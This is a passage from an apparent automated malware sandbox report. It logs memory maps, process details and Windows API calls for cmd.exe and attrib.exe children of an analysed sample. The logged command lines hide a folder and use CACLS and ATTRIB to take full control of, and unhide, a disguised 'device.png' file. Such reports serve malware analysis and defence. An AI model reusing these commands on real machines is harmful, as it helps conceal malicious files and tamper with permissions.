"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18499 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 18500 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18501 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18502 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 18503 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18504 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18505 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18506 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 18507 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18508 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18509 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 18510 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18511 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 274 os_tid = 0xb0c Process: id = "217" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167e0" os_pid = "0xa40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "214" os_parent_pid = "0xb74" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18512 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18513 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18514 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18515 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 18516 start_va = 0x530000 end_va = 0x536fff entry_point = 0x530000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 18517 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18518 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18519 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18520 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 18521 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18522 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18523 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18524 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18525 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 18526 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 18527 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 18528 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18529 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 18530 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18531 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18532 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 18533 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18534 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18535 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18536 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 18537 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18538 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18539 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 18540 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18541 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 275 os_tid = 0xba4 Process: id = "218" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0xa3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18554 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18555 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18556 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18557 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 18558 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 18559 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18560 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18561 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18562 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 18563 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18564 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18565 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18566 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18567 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 18568 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 18569 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 18570 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18571 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18572 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18573 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18574 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18575 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18576 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18577 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18578 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 18579 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18580 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 18581 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 18582 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 18583 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 18584 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 18585 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 18586 start_va = 0x570000 end_va = 0x116ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 18587 start_va = 0x1170000 end_va = 0x12d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Region: id = 18593 start_va = 0x12e0000 end_va = 0x15aefff entry_point = 0x12e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 276 os_tid = 0xadc [0147.993] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfb54 | out: lpSystemTimeAsFileTime=0x1cfb54*(dwLowDateTime=0x9225cae0, dwHighDateTime=0x1d440a9)) [0147.993] GetCurrentProcessId () returned 0xa3c [0147.993] GetCurrentThreadId () returned 0xadc [0147.993] GetTickCount () returned 0x2df08 [0147.993] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfb4c | out: lpPerformanceCount=0x1cfb4c*=20478245734) returned 1 [0147.994] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0147.994] __set_app_type (_Type=0x1) [0147.994] __p__fmode () returned 0x76b331f4 [0147.994] __p__commode () returned 0x76b331fc [0147.994] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0147.994] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0147.994] GetCurrentThreadId () returned 0xadc [0147.994] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xadc) returned 0x38 [0147.995] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0147.995] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0147.995] SetThreadUILanguage (LangId=0x0) returned 0x409 [0147.995] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0147.995] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfae4 | out: phkResult=0x1cfae4*=0x0) returned 0x2 [0147.995] VirtualQuery (in: lpAddress=0x1cfb1b, lpBuffer=0x1cfab4, dwLength=0x1c | out: lpBuffer=0x1cfab4*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.995] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfab4, dwLength=0x1c | out: lpBuffer=0x1cfab4*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0147.995] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfab4, dwLength=0x1c | out: lpBuffer=0x1cfab4*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0147.995] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfab4, dwLength=0x1c | out: lpBuffer=0x1cfab4*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.995] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfab4, dwLength=0x1c | out: lpBuffer=0x1cfab4*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0147.995] GetConsoleOutputCP () returned 0x1b5 [0147.995] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0147.995] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0147.995] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.995] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0147.996] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.996] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0147.996] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.996] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0147.996] _get_osfhandle (_FileHandle=0) returned 0x3 [0147.996] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0147.996] _get_osfhandle (_FileHandle=0) returned 0x3 [0147.996] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0147.996] GetEnvironmentStringsW () returned 0x290368* [0147.997] FreeEnvironmentStringsW (penv=0x290368) returned 1 [0147.997] GetEnvironmentStringsW () returned 0x290368* [0147.997] FreeEnvironmentStringsW (penv=0x290368) returned 1 [0147.997] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cea54 | out: phkResult=0x1cea54*=0x40) returned 0x0 [0147.997] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x0, lpData=0x1cea60*=0x18, lpcbData=0x1cea58*=0x1000) returned 0x2 [0147.997] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x4, lpData=0x1cea60*=0x1, lpcbData=0x1cea58*=0x4) returned 0x0 [0147.997] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x0, lpData=0x1cea60*=0x1, lpcbData=0x1cea58*=0x1000) returned 0x2 [0147.997] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x4, lpData=0x1cea60*=0x0, lpcbData=0x1cea58*=0x4) returned 0x0 [0147.997] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x4, lpData=0x1cea60*=0x40, lpcbData=0x1cea58*=0x4) returned 0x0 [0147.997] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x4, lpData=0x1cea60*=0x40, lpcbData=0x1cea58*=0x4) returned 0x0 [0147.997] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x0, lpData=0x1cea60*=0x40, lpcbData=0x1cea58*=0x1000) returned 0x2 [0147.997] RegCloseKey (hKey=0x40) returned 0x0 [0147.997] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cea54 | out: phkResult=0x1cea54*=0x40) returned 0x0 [0147.997] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x0, lpData=0x1cea60*=0x40, lpcbData=0x1cea58*=0x1000) returned 0x2 [0147.997] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x4, lpData=0x1cea60*=0x1, lpcbData=0x1cea58*=0x4) returned 0x0 [0147.997] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x0, lpData=0x1cea60*=0x1, lpcbData=0x1cea58*=0x1000) returned 0x2 [0147.998] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x4, lpData=0x1cea60*=0x0, lpcbData=0x1cea58*=0x4) returned 0x0 [0147.998] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x4, lpData=0x1cea60*=0x9, lpcbData=0x1cea58*=0x4) returned 0x0 [0147.998] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x4, lpData=0x1cea60*=0x9, lpcbData=0x1cea58*=0x4) returned 0x0 [0147.998] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x0, lpData=0x1cea60*=0x9, lpcbData=0x1cea58*=0x1000) returned 0x2 [0147.998] RegCloseKey (hKey=0x40) returned 0x0 [0147.998] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886376 [0147.998] srand (_Seed=0x5b886376) [0147.998] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\"" [0147.998] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\"" [0147.998] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0147.998] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x291ac8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0147.998] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0147.999] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0147.999] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0147.999] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0147.999] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0147.999] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0147.999] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0147.999] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0147.999] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0147.999] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0147.999] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0147.999] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0147.999] GetEnvironmentStringsW () returned 0x2924b8* [0147.999] FreeEnvironmentStringsW (penv=0x2924b8) returned 1 [0147.999] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.999] GetEnvironmentVariableW (in: 